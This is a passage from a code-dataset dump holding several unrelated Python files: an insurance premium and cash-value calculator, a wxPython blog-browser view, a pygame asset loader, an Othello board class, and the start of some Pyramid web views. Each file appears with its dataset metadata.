r\"^[mf01男女]$|^male$|^female$\", flags=re.IGNORECASE\n )\n\n @classmethod\n def parse(cls, gender: str) -> \"Gender\":\n \"\"\"Convert a gender-like string into a proper Gender Enum.\"\"\"\n if gender in cls.male_like:\n return cls.MALE\n elif gender in cls.female_like:\n return cls.FEMALE\n else:\n return cls.NEUTRAL\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Person:\n\n EM_LEVELS: ClassVar = [\"0\", \"50\", \"75\", \"100\", \"125\", \"150\"]\n OCCUPATIONS: ClassVar = [str(x) for x in range(7)]\n\n age: int\n gender: Gender\n occupation: str = \"1\"\n em_level: str = \"0\"\n social_security: bool = True\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Product:\n \"\"\"\n \"\"\"\n\n name: str = attr.ib()\n path: str = attr.ib()\n mapping: dict = {}\n death_level_ref: str = \"\"\n\n tc983: Factors = None\n t5658: Factors = None\n th528: Factors = None\n th606: Factors = None\n\n def __attrs_post_init__(self):\n self._load_factors()\n self._load_mapping()\n\n def _load_factors(self):\n factors = Path(self.path)\n if not factors.exists():\n raise FileNotFoundError(\n \"Enter a valid path, please?\\n\"\n f\"{factors}\\nis not a correct path.\"\n )\n else:\n for factor in factors.iterdir():\n if \"TC983\" in factor.stem or \"TC804\" in factor.stem:\n break\n else:\n raise ValueError(\"No factor is found in\\n{factors}\")\n\n for factor in factors.iterdir():\n if not factor.stem.startswith(\"~$\"): # Skip temp files.\n if \"TC983\" in factor.stem or \"TC804\" in factor.stem:\n self.tc983 = self._load_worksheet(factor)\n elif \"T5658\" in factor.stem:\n self.t5658 = self._load_worksheet(factor)\n elif \"TH528\" in factor.stem:\n self.th528 = self._load_worksheet(factor)\n elif \"TH606\" in factor.stem:\n self.th606 = self._load_worksheet(factor)\n else:\n pass\n\n def _load_mapping(self):\n \"\"\"Convert TC983 to a Python readable mapping.\"\"\"\n mapping = {}\n for row in self.tc983.iter_rows():\n\n if row[0].value is not None and row[0].value[:3] == self.name:\n coverage_mode, remainders = re.match(\n \"Policy Term = ([tT]?o?\\s?[0-9]{0,3})(.*)\", row[3].value\n ).groups()\n other_modes = re.findall(\"[\\w^=]+\", remainders)\n mapping[row[2].value] = {\n \"payment_mode\": str(row[1].value),\n \"coverage_mode\": str(coverage_mode),\n \"other_modes\": other_modes,\n }\n\n self.mapping = mapping\n\n def death_levels(self):\n \"\"\"Get the death reference from T5658.\"\"\"\n\n for col in self.t5658.iter_cols():\n death_refs = set(\n map(\n lambda x: x.value[3] if x.value is not None else None,\n col[1:],\n )\n )\n break\n else:\n raise ValueError # dead code\n\n death_refs ^= {None}\n return death_refs\n\n def modes(self, modes: str) -> Optional[list]:\n \"\"\"Get a sorted list of payment/coverage/other modes.\"\"\"\n\n def _unique(seq):\n \"\"\"Return a list of unique values in ``seq``.\n\n Works on list if lists.\n \"\"\"\n return reduce(lambda x, y: x if y in x else x + [y], [[]] + seq)\n\n if modes not in [\"payment_mode\", \"coverage_mode\", \"other_modes\"]:\n raise ValueError(\n \"'modes' must be one of the valid modes:\\n\"\n \"payment_mode/coverage_mode/other_modes\"\n )\n modes_list = []\n for key, val in self.mapping.items():\n if val[modes]:\n modes_list.append(val[modes])\n if modes_list:\n return sorted(_unique(modes_list), key=len)\n else:\n return None\n\n def has(self, table_name: str) -> bool:\n \"\"\"Return True if the product has the asked table.\"\"\"\n\n def _has_annuity(name):\n \"\"\"Check if a product is an annuity.\"\"\"\n match = re.match(r\"[a-z]a[^r].?\", name, flags=re.IGNORECASE)\n return True if match is not None else None\n\n tables = {\n \"premium\": self.t5658,\n \"extra_premium\": self.th606,\n \"cash_value\": self.th528,\n \"annuity\": _has_annuity(self.name),\n }\n if table_name not in tables.keys():\n # Validity check\n raise ValueError(f\"'table_name' must be one of {tables.keys()}.\")\n return False if tables[table_name] is None else True\n\n @staticmethod\n def _load_worksheet(filename: Path) -> Factors:\n \"\"\"Load the worksheet only, data only.\"\"\"\n workbook = load_workbook(filename, data_only=True)\n\n for sheet in workbook.sheetnames:\n if \"re\" != sheet.lower():\n worksheet = workbook[sheet]\n break\n else:\n worksheet = None\n\n if worksheet:\n return worksheet\n else:\n raise ValueError(\n f\"{filename.name}'s format is not correct.\"\n \"(located in {filename.parent})\"\n )\n\n\n@attr.s(\n auto_attribs=True, repr=False, init=False, str=False, cmp=False, slots=True\n)\nclass ModelPoint:\n \"\"\"Hold all the ugliness of handling model points.\"\"\"\n\n product: Product\n insured: Person\n frequency: str\n sum_assured: Decimal # For calculations.\n sum_assured_raw: Decimal # For printing.\n payment_mode: str\n coverage_mode: str\n other_modes: Sequence\n coverage_period: int\n\n umc3: str\n umc4: str\n umc7: str\n\n keys: MutableMapping[str, str]\n\n premium: Decimal\n extra_premium: Decimal\n total_premium: Decimal\n cash_values: Iterator[Decimal]\n annuities: Iterator[Decimal]\n\n def build(self) -> NoReturn:\n \"\"\"Fill the rest of the attributes once the required fields are set.\"\"\"\n self.coverage_period = parse(self.coverage_mode, self.insured.age)\n self.sum_assured_raw = self.sum_assured\n # Determine the Unique Mapping Codes\n for umc3, val in self.product.mapping.items():\n if (\n val[\"payment_mode\"] == self.payment_mode\n and val[\"coverage_mode\"] == self.coverage_mode\n and val[\"other_modes\"] == self.other_modes\n ):\n self.umc3 = umc3\n break\n else:\n pprint(self.product.mapping)\n raise ValueError(\n \"Cannot determine a UMC3 code:\"\n f\"{pformat(self.product.mapping)}\"\n )\n\n if not self.product.death_level_ref:\n death_level = \"N\"\n else:\n if self.product.death_level_ref == \"sa\":\n death_level = str(self.sum_assured)\n self.sum_assured = Decimal(\"1\")\n elif self.product.death_level_ref == \"occupation\":\n death_level = self.insured.occupation\n elif self.product.death_level_ref == \"social_security\":\n if self.insured.social_security:\n death_level = \"P\"\n else:\n death_level = \"Q\"\n elif self.product.death_level_ref == \"nhh\":\n pass\n else:\n raise NotImplementedError\n\n self.umc4 = self.umc3 + death_level\n self.umc7 = (\n f\"{self.umc3}{self.insured.age:0>2}{death_level}\"\n f\"{self.insured.gender}\"\n ).upper()\n\n self.keys = {\n \"age\": (\n \"INSTPR\"\n if self.insured.age == 0\n else f\"INSPRM{self.insured.age:0>2}\"\n ),\n \"frequency\": f\"MFACT{self.frequency}\",\n \"premium\": f\"{self.umc4}{self.insured.gender}\".upper(),\n \"extra_premium\": (\n f\"{self.umc3}{self.insured.gender}{self.insured.em_level}\"\n ).upper(),\n \"premium_unit\": \"PREM_UNIT\",\n \"sa_unit\": \"UNIT\",\n \"first_policy_year\": \"INSPRM01\",\n }\n\n # Calculations\n self.premium = self._premium()\n\n if self.product.has(\"extra_premium\") and self.insured.em_level != \"0\":\n self.extra_premium = self._extra_premium()\n else:\n self.extra_premium = Decimal()\n\n if self.product.has(\"cash_value\"):\n self.cash_values = self._cash_values()\n else:\n self.cash_values = iter(())\n\n if self.product.has(\"annuity\"):\n self.annuities = self._annuities()\n else:\n self.annuities = iter(())\n\n self.total_premium = self.premium + self.extra_premium\n\n def _premium(self) -> Decimal:\n \"\"\"Find the premium of the given model point.\"\"\"\n\n for row in self.product.t5658.iter_rows():\n list_row = [x.value for x in row]\n col_index = list_row.index(self.keys[\"age\"])\n frequency_index = list_row.index(self.keys[\"frequency\"])\n premium_unit_index = list_row.index(self.keys[\"premium_unit\"])\n sa_unit_index = list_row.index(self.keys[\"sa_unit\"])\n break\n else:\n raise KeyError\n\n for col in self.product.t5658.iter_cols():\n row_index = [x.value for x in col].index(self.keys[\"premium\"])\n break\n else:\n raise KeyError\n\n premium_factor = Decimal(\n self.product.t5658.cell(row_index + 1, col_index + 1).value\n )\n frequency_factor = Decimal(\n self.product.t5658.cell(row_index + 1, frequency_index + 1).value\n )\n premium_unit = Decimal(\n self.product.t5658.cell(\n row_index + 1, premium_unit_index + 1\n ).value\n )\n sa_unit = Decimal(\n self.product.t5658.cell(row_index + 1, sa_unit_index + 1).value\n )\n\n premium = decimal_round(\n (\n premium_factor\n / premium_unit\n / sa_unit\n * frequency_factor\n * self.sum_assured\n ),\n digits=log10(premium_unit),\n )\n return premium\n\n def _extra_premium(self) -> Decimal:\n\n for row in self.product.th606.iter_rows():\n list_row = [x.value for x in row]\n col_index = list_row.index(self.keys[\"age\"])\n frequency_index = list_row.index(self.keys[\"frequency\"])\n premium_unit_index = list_row.index(self.keys[\"premium_unit\"])\n sa_unit_index = list_row.index(self.keys[\"sa_unit\"])\n break\n else:\n raise KeyError\n\n for col in self.product.th606.iter_cols():\n row_index = [x.value for x in list(col)].index(\n self.keys[\"extra_premium\"]\n )\n break\n else:\n raise KeyError\n\n sub_premium_factor = Decimal(\n self.product.th606.cell(row_index + 1, col_index + 1).value\n )\n frequency_factor = Decimal(\n self.product.th606.cell(row_index + 1, frequency_index + 1).value\n )\n premium_unit = Decimal(\n self.product.th606.cell(\n row_index + 1, premium_unit_index + 1\n ).value\n )\n sa_unit = Decimal(\n self.product.th606.cell(row_index + 1, sa_unit_index + 1).value\n )\n\n sub_premium = decimal_round(\n (\n sub_premium_factor\n / premium_unit\n / sa_unit\n * frequency_factor\n * self.sum_assured\n ),\n digits=log10(premium_unit),\n )\n return sub_premium\n\n def _annuities(self) -> Generator[Decimal, None, None]:\n \"\"\"Calculate annuities.\"\"\"\n return annuities[self.product.name](self)\n\n def _cash_values(self) -> Generator[Decimal, None, None]:\n \"\"\"Calculate cash values, return a generator.\"\"\"\n\n for row in self.product.th528.iter_rows():\n list_row = [x.value for x in row]\n col_pos = list_row.index(self.keys[\"first_policy_year\"]) + 1\n premium_unit_pos = list_row.index(self.keys[\"premium_unit\"]) + 1\n sa_unit_pos = list_row.index(self.keys[\"sa_unit\"]) + 1\n break\n else:\n raise ValueError\n\n for col in self.product.th528.iter_cols():\n row_pos = [x.value for x in col].index(self.umc7) + 1\n break\n else:\n raise ValueError\n\n premium_unit = Decimal(\n self.product.th528.cell(row_pos, premium_unit_pos).value\n )\n sa_unit = Decimal(self.product.th528.cell(row_pos, sa_unit_pos).value)\n\n # Calculate the CV for a single point.\n def _cash_value_formula(x: Decimal) -> Decimal:\n\n return decimal_round(\n (x / premium_unit / sa_unit * self.sum_assured),\n digits=log10(premium_unit),\n )\n\n for t in range(1, self.coverage_period + 1):\n if self.coverage_mode != \"To 105\" and t == self.coverage_period:\n # Force the last year's CV to 0 for non-whole-life insurances.\n yield Decimal()\n else:\n yield _cash_value_formula(\n Decimal(\n self.product.th528.cell(row_pos, col_pos + t - 1).value\n )\n )\n\n\n@attr.s(auto_attribs=True, slots=True, frozen=True)\nclass Layout:\n \"\"\"Layout management.\n\n This class contains **all** information for setting and printing\n the layout of the final results.\n \"\"\"\n\n console_width: ClassVar = console_width()\n __SCHEME_PREMIUMS: ClassVar = OrderedDict(\n [\n (\"Product\", (9, \"^\")),\n (\"Sum Assured\", (14, \">\")),\n (\"Prem Term\", (11, \"^\")),\n (\"Pol Term\", (10, \"^\")),\n (\"Premium\", (14, \">\")),\n (\"Extra Premium\", (15, \">\")),\n ]\n )\n __SCHEME_BENEFITS: ClassVar = OrderedDict(\n [\n (\"Policy Year\", (15, \">\")),\n (\"Annuity\", (19, \">\")),\n (\"Cash Values\", (19, \">\")),\n ]\n )\n\n @classmethod\n def check_width(cls):\n \"\"\"Check the console width.\"\"\"\n if Layout.console_width < 80:\n warnings.warn(\n \"Set the console width to 80 for optimized visuals.\",\n UserWarning,\n )\n\n @classmethod\n def separator(cls, title=\"\", symbol=\"=\") -> NoReturn:\n \"\"\"Print a section separator with the given symbol.\n\n >>> Layout.separator(\"New Session Started\")\n # Prints '====== New Session Started ======'\n >>> Layout.separator(f\"Main Benefits for {product.name}\", sep=\"-\")\n >>> Layout.separator()\n # Prints '---------------------------------'\n \"\"\"\n # Pad spaces around the title.\n if title:\n if not title.startswith(\" \"):\n title = \" \" + title\n if not title.endswith(\" \"):\n title += \" \"\n else:\n # Since f-string does not support for formatting empty strings.\n title = symbol\n print(f\"{title:{symbol}^{cls.console_width}}\")\n\n @classmethod\n def print_premiums_header(cls) -> NoReturn:\n \"\"\"Print the header of the given section.\"\"\"\n for title, (width, align) in cls.__SCHEME_PREMIUMS.items():\n print(f\"{title: {align}{cls.adjusted(width)}}\", end=\"\")\n print()\n\n @classmethod\n def print_premiums(cls, model_point: ModelPoint) -> NoReturn:\n \"\"\"Print the premiums result.\"\"\"\n values = [\n model_point.product.name,\n model_point.sum_assured_raw,\n model_point.payment_mode,\n model_point.coverage_mode,\n model_point.premium,\n model_point.extra_premium,\n ]\n for value, (width, align) in zip(\n values, cls.__SCHEME_PREMIUMS.values()\n ):\n print(\n f\"{cls.formatted(value): {align}{cls.adjusted(width)}}\", end=\"\"\n )\n print()\n\n @classmethod\n def print_benefits(cls, model_point: ModelPoint):\n \"\"\"Print the benefits result.\"\"\"\n\n if model_point.product.has(\"cash_value\"):\n\n cls.separator(\n f\"Main Benefits for {model_point.product.name}\", symbol=\"/\"\n )\n cls.separator(symbol=\"-\")\n for title, (width, align) in cls.__SCHEME_BENEFITS.items():\n width = cls.adjusted(width)\n print(f\" {title: {align}{width}}\", end=\"\")\n print()\n\n policy_years = range(1, model_point.coverage_period + 1)\n for policy_year, cv, annuity in zip_longest(\n policy_years,\n model_point.cash_values,\n model_point.annuities,\n fillvalue=Decimal(),\n ):\n if (\n policy_year > 20\n and policy_year % 5\n and policy_year != model_point.coverage_period\n ):\n continue\n cv = max(cv - annuity, Decimal())\n for value, (width, align) in zip(\n [policy_year, annuity, cv], cls.__SCHEME_BENEFITS.values()\n ):\n print(\n f\" {cls.formatted(value): {align}{cls.adjusted(width)}}\",\n end=\"\",\n )\n print()\n else:\n puts(\n colored.yellow(\n f\"{model_point.product.name} does not have a benefit schedule.\"\n )\n )\n\n @classmethod\n def adjusted(cls, width: int) -> int:\n \"\"\"Return the width adjusted to the console width if the width\n is greater than 80, otherwise return the width.\"\"\"\n return max(int(width / 80 * Layout.console_width), width)\n\n @classmethod\n def formatted(cls, value: Union[Decimal, str]) -> str:\n \"\"\"Add thousand-separators if `value` is a Decimal, otherwise\n leave it alone.\n \"\"\"\n if not isinstance(value, Decimal):\n return value\n if value == Decimal():\n return \"-\"\n else:\n return f\"{value:,.2f}\"\n\n\n@attr.s(auto_attribs=True, slots=True)\nclass Policy:\n\n insured: Person\n frequency: str\n policyholder: Person = None\n\n model_points: MutableMapping[str, ModelPoint] = OrderedDict()\n total_premium: Decimal = Decimal()\n\n def append(self, model_point: ModelPoint) -> NoReturn:\n \"\"\"Add a model point to the policy.\"\"\"\n\n self.model_points[model_point.product.name] = model_point\n self.total_premium += model_point.total_premium\n\n def present(self) -> NoReturn:\n \"\"\"Print out the results.\"\"\"\n Layout.check_width()\n\n Layout.separator(\"Premiums\", \"=\")\n Layout.print_premiums_header()\n for model_point in self.model_points.values():\n Layout.print_premiums(model_point)\n print(f\"\\nTotal Premiums: {Layout.formatted(self.total_premium)}\\n\")\n\n Layout.separator(\"Benefits\", \"=\")\n for model_point in self.model_points.values():\n Layout.print_benefits(model_point)\n","sub_path":"upc/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":20617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"356495905","text":"from zoundry.appframework.global_services import getApplicationModel\r\nfrom zoundry.appframework.global_services import getResourceRegistry\r\nfrom zoundry.appframework.resources.resourceutils import ZMappedImageList\r\nfrom zoundry.appframework.ui.util.uiutil import fireRefreshEvent\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menu import ZMenu\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZModelBasedMenuContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.common.menu.menumodel import ZModelBasedMenuEventHandler\r\nfrom zoundry.appframework.ui.widgets.controls.listex import IZListViewExContentProvider\r\nfrom zoundry.appframework.ui.widgets.controls.listex import ZListViewEx\r\nfrom zoundry.blogapp.constants import IZBlogAppServiceIDs\r\nfrom zoundry.blogapp.messages import _extstr\r\nfrom zoundry.blogapp.services.accountstore.accountstore import IZAccountStoreListener\r\nfrom zoundry.blogapp.ui.actions.blog.blogactions import ZBlogMenuActionContext\r\nfrom zoundry.blogapp.ui.events.viewevents import ZEVT_VIEW_SELECTION_CHANGED\r\nfrom zoundry.blogapp.ui.menus.blog.blogmenu import ZBlogMenuModel\r\nfrom zoundry.blogapp.ui.util.viewutil import fireViewUnselectionEvent\r\nfrom zoundry.blogapp.ui.views.view import ZView\r\nfrom zoundry.blogapp.ui.views.viewsel import IZViewSelectionTypes\r\nfrom zoundry.blogapp.ui.views.viewselimpl import ZViewSelection\r\nfrom zoundry.blogapp.ui.util.viewutil import fireViewSelectionEvent\r\nimport wx\r\n\r\n# ------------------------------------------------------------------------------\r\n# List view content provider for providing a list of blogs.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogListProvider(IZListViewExContentProvider):\r\n\r\n def __init__(self):\r\n self.accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n self.accountId = None\r\n self.blogs = None\r\n self.imageList = self._createImageList()\r\n\r\n self.refresh()\r\n # end __init__()\r\n\r\n def getAccountId(self):\r\n return self.accountId\r\n # end getAccountId()\r\n\r\n def setAccountId(self, accountId):\r\n self.accountId = accountId\r\n # end setAccountId()\r\n\r\n def _createImageList(self):\r\n # FIXME (EPW) Move account and blog icons to a common area and use from there (also chnage navigator)\r\n registry = getResourceRegistry()\r\n imgList = ZMappedImageList()\r\n imgList.addImage(u\"blog\", registry.getBitmap(u\"images/perspectives/standard/navigator/blog.png\")) #$NON-NLS-1$ #$NON-NLS-2$\r\n\r\n return imgList\r\n # end _createImageList\r\n\r\n def refresh(self):\r\n self.blogs = []\r\n for account in self.accountStore.getAccounts():\r\n if account.getId() == self.accountId:\r\n for blog in account.getBlogs():\r\n self.blogs.append(blog)\r\n # end refresh()\r\n\r\n def getImageList(self):\r\n return self.imageList\r\n # end getImageList()\r\n\r\n def getNumColumns(self):\r\n return 1\r\n # end getNumColumns()\r\n\r\n def getNumRows(self):\r\n return len(self.blogs)\r\n # end getNumRows()\r\n\r\n def getColumnInfo(self, columnIndex): #@UnusedVariable\r\n return (_extstr(u\"blogbrowser.Blogs\"), None, None, ZListViewEx.COLUMN_LOCKED | ZListViewEx.COLUMN_RELATIVE, 100) #$NON-NLS-1$\r\n # end getColumnInfo()\r\n\r\n def getRowText(self, rowIndex, columnIndex): #@UnusedVariable\r\n return self.blogs[rowIndex].getName()\r\n # end getRowText()\r\n\r\n def getRowImage(self, rowIndex, columnIndex): #@UnusedVariable\r\n return self.imageList[u\"blog\"] #$NON-NLS-1$\r\n # end getRowImage()\r\n\r\n def getBlogAtIndex(self, index):\r\n return self.blogs[index]\r\n # end getBlogAtIndex()\r\n\r\n# end ZBlogListProvider\r\n\r\n\r\n# ------------------------------------------------------------------------------\r\n# Implements the second of three views in the Browse perspective. This view\r\n# presents the user with a list of Blogs found in the selected account.\r\n# ------------------------------------------------------------------------------\r\nclass ZBlogBrowseView(ZView, IZAccountStoreListener):\r\n\r\n def __init__(self, parent):\r\n ZView.__init__(self, parent, wx.ID_ANY)\r\n\r\n self._createWidgets()\r\n self._layoutWidgets()\r\n self._populateWidgets()\r\n self._bindWidgetEvents()\r\n\r\n self._registerAsAccountListener()\r\n # end __init__()\r\n\r\n def _createWidgets(self):\r\n self.blogListProvider = ZBlogListProvider()\r\n self.blogListView = ZListViewEx(self.blogListProvider, self)\r\n # end _createWidgets()\r\n\r\n def _layoutWidgets(self):\r\n sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer.Add(self.blogListView, 1, wx.EXPAND)\r\n\r\n self.SetSizer(sizer)\r\n self.SetAutoLayout(True)\r\n self.Layout()\r\n # end _layoutWidgets()\r\n\r\n def _populateWidgets(self):\r\n pass\r\n # end _populateWidgets()\r\n\r\n def _bindWidgetEvents(self):\r\n self.Bind(ZEVT_VIEW_SELECTION_CHANGED, self.onViewSelection)\r\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.onBlogSelected, self.blogListView)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.onBlogRightClick, self.blogListView)\r\n self._bindRefreshEvent(self.onZoundryRefresh)\r\n # end _bindWidgetEvents()\r\n\r\n def onBlogRightClick(self, event):\r\n blog = self._getSelectedBlog()\r\n if blog is not None:\r\n menu = self._createBlogCtxMenu(blog)\r\n self.PopupMenu(menu)\r\n menu.Destroy()\r\n event.Skip()\r\n # end onBlogRightClick()\r\n\r\n def _createBlogCtxMenu(self, blog):\r\n menuContext = ZBlogMenuActionContext(self, blog)\r\n menuModel = ZBlogMenuModel()\r\n provider = ZModelBasedMenuContentProvider(menuModel, menuContext)\r\n eventHandler = ZModelBasedMenuEventHandler(menuModel, menuContext)\r\n return ZMenu(self, menuModel.getRootNode(), provider, eventHandler)\r\n # end _createBlogCtxMenu()\r\n\r\n def onViewSelection(self, event):\r\n selection = event.getSelection()\r\n if selection.getType() == IZViewSelectionTypes.ACCOUNT_SELECTION:\r\n accountId = selection.getData()\r\n self.blogListProvider.setAccountId(accountId)\r\n self.blogListProvider.refresh()\r\n self.blogListView.refresh()\r\n self.blogListView.deselectAll()\r\n elif selection.getType() == IZViewSelectionTypes.UNPUBLISHED_ACCOUNT_SELECTION:\r\n self.blogListProvider.setAccountId(None)\r\n self.blogListProvider.refresh()\r\n self.blogListView.refresh()\r\n self.blogListView.deselectAll()\r\n\r\n event.Skip()\r\n # end onViewSelection()\r\n\r\n def onBlogSelected(self, event):\r\n blog = self._getSelectedBlog()\r\n if blog is not None:\r\n account = blog.getAccount()\r\n accountId = account.getId()\r\n blogId = blog.getId()\r\n selection = ZViewSelection(IZViewSelectionTypes.BLOG_SELECTION, (accountId, blogId))\r\n fireViewSelectionEvent(selection, self)\r\n else:\r\n fireViewUnselectionEvent()\r\n event.Skip()\r\n # end onBlogSelected()\r\n\r\n def onZoundryRefresh(self, event):\r\n self.blogListView.refresh()\r\n event.Skip()\r\n # end onZoundryRefresh()\r\n\r\n def onAccountChanged(self, account):\r\n if account.getId() == self.blogListProvider.getAccountId():\r\n self.blogListProvider.refresh()\r\n fireRefreshEvent(self)\r\n # end onAccountChanged()\r\n\r\n def onAccountDeleted(self, account):\r\n if account.getId() == self.blogListProvider.getAccountId():\r\n self.blogListProvider.setAccountId(None)\r\n self.blogListProvider.refresh()\r\n fireRefreshEvent(self)\r\n # end onAccountDeleted()\r\n\r\n def _registerAsAccountListener(self):\r\n accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n accountStore.addListener(self)\r\n # end _registerAsAccountListener()\r\n\r\n def _unregisterAsAccountListener(self):\r\n accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n accountStore.removeListener(self)\r\n # end _unregisterAsAccountListener()\r\n\r\n def destroy(self):\r\n self._unregisterAsAccountListener()\r\n # end destroy()\r\n\r\n def _getSelectedBlog(self):\r\n itemIndexes = self.blogListView.getSelection()\r\n if itemIndexes:\r\n itemIndex = itemIndexes[0]\r\n return self.blogListProvider.getBlogAtIndex(itemIndex)\r\n return None\r\n # end _getSelectedBlog()\r\n\r\n# end ZBlogBrowseView\r\n","sub_path":"src/python/zoundry/blogapp/ui/views/browse/blogbrowser.py","file_name":"blogbrowser.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"128144079","text":"import sys\nimport os\nimport pygame\n\n\nclass ModifyFiles(object):\n def saveFile(self, input, file):\n fObj = open(os.path.join(\"assets\", file), \"w\")\n fObj.write(input)\n fObj.close()\n\n def openFile(self, file):\n try:\n fObj = open(os.path.join(\"assets\", file))\n s = fObj.read()\n fObj.close()\n return s\n except pygame.error as message:\n print(\"Cannot load file:\", file)\n raise sys.exit()(message)\n\n def loadImage(self, file, colorkey=None):\n try:\n image = pygame.image.load(os.path.join(\"assets\", file))\n except pygame.error as message:\n print(\"Cannot load image:\", file)\n raise sys.exit()(message)\n image = image.convert()\n if colorkey is not None:\n if colorkey is -1:\n colorkey = image.get_at((0, 0))\n image.set_colorkey(colorkey, RLEACCEL)\n return image\n","sub_path":"modifyfiles.py","file_name":"modifyfiles.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"305485951","text":"'''\n Erich Kramer - April 2017\n Apache License\n If using this code please cite creator.\n\n'''\nfrom Board import * \n\n\n\nclass OthelloBoard(Board):\n def __init__(self, rows, cols, p1, p2):\n Board.__init__(self, rows, cols)\n self.p1_symbol = p1\n self.p2_symbol = p2\n\n\n#PYTHON: this function is substitute for clone. call as New = Old.cloneOBoard()\n def cloneOBoard(self):\n tmp = OthelloBoard(self.cols, self.rows, self.p1_symbol, self.p2_symbol)\n tmp.grid = copy.deepcopy(self.grid)\n return tmp;\n\n def initialize(self):\n self.set_cell(self.cols //2 -1, self.rows //2 -1, self.p1_symbol)\n self.set_cell(self.cols //2, self.rows //2, self.p1_symbol)\n self.set_cell(self.cols //2 -1, self.rows //2, self.p2_symbol)\n self.set_cell(self.cols //2, self.rows //2 -1, self.p2_symbol)\n\n#PYTHON: Instead of having side effects this function now returns a TUPLE\n def set_coords_in_direction(self, col, row, D):#D=direction\n if(D.name == 'N'):\n row += 1\n elif(D.name == 'NE'):\n col+=1\n row+=1\n elif(D.name == 'E'):\n col+=1\n elif(D.name == 'SE'):\n col+=1\n row-=1\n elif(D.name == 'S'):\n row-=1\n elif(D.name == 'SW'):\n col-=1\n row-=1\n elif(D.name == 'W'):\n col-=1\n elif(D.name == 'NW'):\n col-=1\n row+=1\n else:\n print(\"Invalid Direction.\")\n return (col, row)\n\n#Recursively travel in a direction\n def check_endpoint(self, col, row, symbol, d, match_symbol):#match is bool type\n if not self.is_in_bounds(col, row) or self.is_cell_empty(col,row):\n return False\n else:\n if(match_symbol):\n if(self.get_cell(col, row) == symbol):\n return True\n else:\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return self.check_endpoint(next_col, next_row, symbol, d, match_symbol)\n else:\n if(self.get_cell(col, row) == symbol):\n return False\n else:\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return self.check_endpoint(next_col, next_row, symbol, d, not match_symbol)\n\n def is_legal_move(self, col, row, symbol):\n result = False\n if(not self.is_in_bounds(col, row) or not self.is_cell_empty(col, row)):\n return False\n for d in Direction: #enum from board.py\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n if(self.check_endpoint(next_col, next_row, symbol, d, False)):\n return True\n return False\n \n def flip_pieces_helper(self, col, row, symbol, d):\n if(self.get_cell(col, row) == symbol):\n return 0;\n else:\n self.set_cell(col,row, symbol)\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return 1+ self.flip_pieces_helper(next_col, next_row, symbol, d)\n\n\n\n def flip_pieces(self, col, row, symbol):\n pieces_flipped = 0\n if(not self.is_in_bounds(col, row)):\n print(\"Flip Pieces bad params.\")\n exit();\n for d in Direction:\n (next_col, next_row) = self.set_coords_in_direction(col,row,d)\n if(self.check_endpoint(next_col, next_row, symbol, d, False)):\n pieces_flipped += self.flip_pieces_helper(next_col, next_row, symbol, d);\n\n return pieces_flipped\n\n def has_legal_moves_remaining(self, symbol):\n for c in range (0, self.cols):\n for r in range (0, self.rows):\n if self.is_cell_empty(c, r) and self.is_legal_move(c, r, symbol):\n return True\n return False;\n\n def count_score(self, symbol):\n score = 0\n for c in range (0, self.cols):\n for r in range (0, self.rows):\n if self.grid[c][r] == symbol:\n score+=1\n return score\n\n def play_move(self, col, row, symbol):\n self.set_cell(col, row, symbol)\n self.flip_pieces(col, row, symbol)\n\n\n\n\n","sub_path":"CS331-Assignment2/OthelloBoard.py","file_name":"OthelloBoard.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"308510190","text":"# -*- coding: utf-8 -*--\nfrom pyramid.view import view_config\nimport pyramid.httpexceptions as exc\n\nfrom infolica.exceptions.custom_error import CustomError\nfrom infolica.models import Constant\nfrom infolica.models.models import ControleMutation, Operateur\nfrom infolica.scripts.utils import Utils\nfrom infolica.scripts.authentication import check_connected\n\n@view_config(route_name='controles_mutations', request_method='GET', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='GET', renderer='json')\ndef controles_mutations_view(request):\n \"\"\"\n Return all controles_mutations\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n query = request.dbsession.query(ControleMutation).all()\n return Utils.serialize_many(query)\n\n\n@view_config(route_name='controle_mutation_by_id', request_method='GET', renderer='json')\ndef controles_mutations_by_id_view(request):\n \"\"\"\n Return controle_mutation by id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.id = request.matchdict['id']\n query = request.dbsession.query(ControleMutation).filter(\n ControleMutation.id == id).first()\n return Utils.serialize_one(query)\n\n\n@view_config(route_name='controle_mutation_by_affaire_id', request_method='GET', renderer='json')\ndef controles_mutations_by_affaire_id_view(request):\n \"\"\"\n Return controle_mutation by affaire_id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n affaire_id = request.id = request.matchdict['id']\n query = request.dbsession.query(ControleMutation).filter(\n ControleMutation.affaire_id == affaire_id).first()\n\n if query is None:\n return None\n\n ctrl = Utils.serialize_one(query)\n\n # get operateur\n operateur_id = ctrl['visa']\n\n if operateur_id is not None:\n operateur = 